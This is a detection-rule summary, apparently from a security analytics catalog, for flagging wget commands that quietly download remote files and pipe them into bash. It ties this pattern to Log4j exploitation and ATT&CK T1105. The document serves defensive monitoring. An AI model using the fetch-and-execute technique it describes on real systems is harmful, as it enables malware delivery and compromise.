
Summary
This analytic rule detects the potentially malicious use of the `wget` command across Windows, Linux, and macOS systems to download files from remote locations and pipe them into `bash` for execution. This type of behavior is crucial to monitor, as it is often associated with malware distribution and exploitation attempts, particularly with notable exploits such as CVE-2021-44228 linked to the Log4j vulnerability. The detection focuses on analyzing event logs collected by Endpoint Detection and Response (EDR) agents, specifically examining process execution events and their command-line arguments. By identifying command invocations of `wget` that include flags for quiet operations and output redirection to `bash`, the system can flag and alert on suspicious activities that could lead to system compromise or unauthorized data access.
Categories
- Endpoint
- Linux
- macOS
- Windows
Data Sources
- Windows Registry
- Process
- Command
- Application Log
ATT&CK Techniques
- T1105
Created: 2024-12-10